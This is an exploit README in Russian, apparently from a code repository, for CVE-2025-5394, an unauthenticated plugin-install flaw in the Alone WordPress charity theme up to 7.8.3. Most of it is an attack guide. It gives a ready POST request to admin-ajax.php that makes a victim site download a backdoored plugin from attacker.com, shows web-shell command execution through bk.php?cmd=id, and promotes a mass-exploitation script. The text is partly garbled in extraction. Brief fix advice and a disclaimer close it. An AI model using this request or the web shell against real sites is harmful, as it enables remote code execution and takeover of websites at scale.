
Alone – Многоцелевая некоммерческая тема WordPress для благотворительности <= 7.8.3 - Отсутствие авторизации приводит к неаутентифицированной произвольной загрузке файлов через установку плагина
🔥 Сводка об уязвимости
Тема WordPress Alone версий <= 7.8.3 подвержена уязвимости неаутентифицированной произвольной загрузки файлов. Эта ошибка позволяет неаутентифицированным злоумышленникам загружать и устанавливать произвольные ZIP-файлы плагинов с удалённых URL-адресов через незащищённую AJAX-конечную точку, что приводит к удалённому выполнению кода (RCE) путём развёртывания плагинов с бэкдорами.
Эта уязвимость возникает из-за функции beplus_import_pack_install_plugin, которая доступна публично через wp_ajax_nopriv_ без каких-либо проверок аутентификации или прав. Функция устанавливает и активирует плагин по URL-адресу, указанному пользователем.
🔍 Затронутая тема
🧪 Возможности эксплойта
/wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin🧠 Исследователь
🚀 Использование
Подготовьте ZIP-файл вредоносного плагина, размещённый на контролируемом вами сервере.
Plugin Name:) и PHP-бэкдор (например, bk.php)Отправьте следующий POST-запрос:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded
action=beplus_import_pack_install_plugin&
data[plugin_slug]=hello-dolly&
data[plugin_source]=https://attacker.com/hello-dolly.zip
В случае успеха плагин будет установлен и активирован. Доступ к шеллу:
https://victim.com/wp-content/plugins/hello-dolly/bk.php?cmd=id
🧰 Скрипт массовой эксплуатации Этот репозиторий включает инструмент массовой эксплуатации со следующими возможностями:
result.txtПодробности см. в mass_beplus_exploit.py.
🛠 Рекомендации по исправлению
wp_ajax_nopriv_beplus_import_pack_install_plugin.current_user_can('install_plugins'))🔒 Отказ от ответственности:
Эта информация предоставлена исключительно в образовательных целях и для авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам или их использование является незаконным и неэтичным.
📚 Ссылка:
CVE: CVE-2025-5394
Исследователь: Thai An